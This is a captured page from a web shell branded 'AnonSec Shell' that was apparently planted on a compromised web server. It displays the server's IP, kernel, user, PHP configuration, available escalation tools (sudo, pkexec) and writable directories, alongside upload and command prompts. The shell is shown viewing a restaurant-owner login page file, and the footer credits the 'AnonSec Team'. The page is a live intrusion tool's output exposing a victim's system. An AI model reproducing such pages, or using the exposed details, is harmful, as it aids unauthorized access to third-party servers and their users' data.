AnonSec Shell
Server IP : 162.214.74.102  /  Your IP : 216.73.216.139
Web Server : Apache
System : Linux dedi-4363141.lrsys.com.br 3.10.0-1160.119.1.el7.tuxcare.els25.x86_64 #1 SMP Wed Oct 1 17:37:27 UTC 2025 x86_64
User : lrsys ( 1015)
PHP Version : 5.6.40
Disable Function : exec,passthru,shell_exec,system
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/lrsys/public_html/lrsys_projetos/sopizzas/application/views/restaurantadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/lrsys/public_html/lrsys_projetos/sopizzas/application/views/restaurantadmin/login.php.bak
<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <title>Dine2You | Restaurant Owner Register</title>
  <meta name="keywords" content="">
  <meta name="description" content="">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
  
  <meta property="og:title" content="">
	<meta property="og:type" content="website">
	<meta property="og:url" content="">
	<meta property="og:site_name" content="">
	<meta property="og:description" content="">

  <!-- Styles -->
  <link rel="stylesheet" href="<?=base_url();?>assets/css/font-awesome.min.css">
  <link rel="stylesheet" href="<?=base_url();?>assets/css/animate.css">
  <link href='http://fonts.googleapis.com/css?family=Raleway:400,100,200,300,500,600,700,800,900|Montserrat:400,700' rel='stylesheet' type='text/css'>
  

  <link rel="stylesheet" href="<?=base_url();?>assets/css/bootstrap.min.css">
  <link rel="stylesheet" href="<?=base_url();?>assets/css/front-end/main.css">
  <link rel="stylesheet" href="<?=base_url();?>assets/css/front-end/style.css">
  <!-- <link rel="stylesheet" type="text/css" href="assets/css/style.css" /> -->
  <!-- <script src="assets/js/modernizr-2.7.1.js"></script> -->
  
</head>

<body>
    <section id="restaurants">   
      <div class="navbar navbar-fixed-top">
        <div class="container">
          <div class="navbar-header">
            <button type="button" style="background-color: #333;" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
              <span class="icon-bar"></span>
            </button>
            <a class="logo" href="<?=base_url();?>"><img src="<?=base_url();?>assets/logo-secondary.png" alt="Logo"></a>
          </div>
     	<div class="text-center regowener-header">
	        <h3 style="color: #F5861F !important;">Join. It's free, and there's no contract.</h3>
	        <p style="color: #FFF;">Increase Sales, Simplify Delivery Orders, Market Yourself Online</p>
	      </div>
        </div>
      </div>
    </section>
    <div class="for-fixed"></div>
    <section id="cos-login">
      <div class="container">
        <div class="row res-reg">
          <div class="col-md-12 col-sm-12 col-xs-12">
            <div class="col-md-6">
              <h3 class="text-center">Log In for Business Owners</h3>
              <?php if($this->session->flashdata('success_msg')) { ?>
              <div class="alert alert-info text-center">
                <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>
                <strong><?php echo $this->session->flashdata('success_msg'); ?></strong>
              </div>
              <?php } ?>
              <?php if($this->session->flashdata('error_msg')) { ?>
              <div class="alert alert-danger text-center">
                <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>
                <strong><?php echo $this->session->flashdata('error_msg'); ?></strong>
              </div>
              <?php } ?>
              <?php if(validation_errors() != FALSE) { ?>
              <div class="alert alert-danger text-center">
                <a href="#" class="close" data-dismiss="alert" aria-label="close">&times;</a>
                <strong><?php echo validation_errors(); ?></strong>
              </div>
              <?php } ?>
              <?php $validator = array('role' => 'form', 'data-toggle' => 'validator'); echo form_open('verifylogin_restadmin', $validator); ?>
              <div class="input-group form-group">
                <span class="input-group-btn">
                  <button class="btn btn-secondary btn-icon" type="button"><i class="fa fa-user" aria-hidden="true"></i></button>
                </span>
                <input type="email" name="username" value="<?php echo set_value('username', isset($data['username']) ? $data['username'] : ''); ?>" class="form-control bod-form" placeholder="Restaurant Email" required>
              </div>
              <div class="input-group form-group">
                <span class="input-group-btn">
                  <button class="btn btn-secondary btn-icon" type="button"><i class="fa fa-lock" aria-hidden="true"></i></button>
                </span>
                <input name="password" type="password" class="form-control bod-form" placeholder="Password" required>
              </div>
              <div class="form-group push--bottom">
                <input type="checkbox" id="checkbox-rememberme" class="hidden" name="rememberme" checked />
                <label class="checkbox" for="checkbox-rememberme">
                  Remember Me
                </label>
                <span class="rememberme-forgetpassword-separator"></span>
                <a href="" class="forgot-password" data-toggle="modal" data-target="#myForgotPassModal">
                  Forgot Password
                </a>
              </div>
              <div class="col-md-12 custom-padding-0">
                <button type="submit" class="btn btn-warning nxt-btn">Login</button>
              </div>
              <div class="clearfix"></div>
              </form>
            </div>
            <div class="col-md-6">
              <div class="col-md-12">
                <div class="col-md-2">
                  <img class="mctop6 mcleft15" src="<?=base_url();?>assets/img/front-end/book.png">
                </div>
                <div class="col-md-10 paddingleft0">
                  <h3 class="h3res">Confirm Orders</h3>
                  <p class="pres">Confirm incoming orders from monitor</p>
                </div>
              </div>
              <div class="col-md-12">
                <div class="col-md-2">
                  <img class="mctop6 mcleft15" src="<?=base_url();?>assets/img/front-end/pc.png">
                </div>
                <div class="col-md-10 paddingleft0">
                  <h3 class="h3res">Manage Your Restaurant</h3>
                  <p class="pres">Update menu and restaurant's settings</p>
                </div>
              </div>
              <div class="col-md-12">
                <div class="col-md-2">
                  <img class="mctop6 mcleft15" src="<?=base_url();?>assets/img/front-end/board.png">
                </div>
                <div class="col-md-10 paddingleft0">
                  <h3 class="h3res">Sales</h3>
                  <p class="pres">Complete analysis of your restaurant's page</p>
                </div>
              </div>
              <div class="col-md-8 mvodd text-center">
                <p class="a-user"><a href="<?=base_url();?>restaurantadmin/register">Sign Up </a> For Create New Account</p>
              </div>
            </div>
          </div>
          <div class="clearfix"></div>
          <p class="orgp text-center mctop30">By using our site you agree to the <a href="terms.html">Restaurant's terms of use.</a></p>
        </div>
      </div>
    </section>
    <!-- Modal -->
      <div id="myForgotPassModal" class="modal fade" role="dialog">
        <div class="modal-dialog md-con">

          <!-- Modal content-->
          <div class="modal-content ">
            <div class="modal-header cos-mh">
              <button type="button" class="close" data-dismiss="modal">&times;</button>
              <h4 class="modal-title text-center">Forgot Password</h4>
            </div>
            <div class="modal-body md-none">
              <div class="col-md-12 col-sm-12 col-xs-12">
              <?php $validator = array('role' => 'form', 'data-toggle' => 'validator'); echo form_open('restaurantadmin', $validator); ?>
                <div class="form-group">
                  <label class="sand" for="forgot_password">Enter Your Email Address</label>
                  <input type="email" class="form-control bod-div" name="forgot_password" id="forgot_password" required="" data-error="Please enter an registered email address" data-remote="<?=base_url()?>restaurantadmin/forgot_password">
                  <div class="help-block with-errors"></div>
                </div>
                <div class="col-md-12 custom-padding-0 text-center">
                  <input type="hidden" name="form_name" id="form_name" value="forgot_password">
                  <button type="submit" class="btn btn-warning nxt-btn">Submit</button>
                </div>
                </form>
              </div>
              <div class="clearfix"></div>
            </div>
            <div class="clearfix"></div>
            <div class="modal-footer">
              <button type="button" class="btn btn-default" data-dismiss="modal">Close</button>
            </div>
          </div>

        </div>
      </div>
    <!-- Modal -->

Anon7 - 2022
AnonSec Team